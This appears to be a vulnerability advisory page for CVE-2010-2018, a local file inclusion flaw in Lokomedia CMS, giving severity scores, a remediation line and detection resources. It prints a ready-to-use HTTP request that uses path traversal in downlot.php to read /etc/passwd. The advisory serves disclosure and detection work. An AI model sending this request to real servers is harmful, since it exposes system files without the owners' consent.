🔙 목록으로 돌아가기

CVE-2010-2018: Lokomedia CMS - Local File Inclusion

TitleLokomedia CMS - Local File Inclusion
Authorr3Y3r53
SeverityHigh
ImpactAttackers can read sensitive files from the server, potentially leading to information disclosure.
RemediationUpdate to the latest version or apply security patches to fix the vulnerability.
CVSS Score7.5
EPSS Score0.00334
CVE IDCVE-2010-2018
CWE IDCWE-22
Tags cve cve2010 lfi lokomedia cms vuln

🔍 Vulnerability Description

A Local File Inclusion (LFI) vulnerability exists in Lokomedia CMS. The application allows an attacker to include files on the server that should not be accessible, potentially exposing sensitive information.

🌐 HTTP Request

GET /downlot.php?file=../../../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2010/CVE-2010-2018.yaml

🦈 Packet Capture: ⬇️ Download cve-2010-2018.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A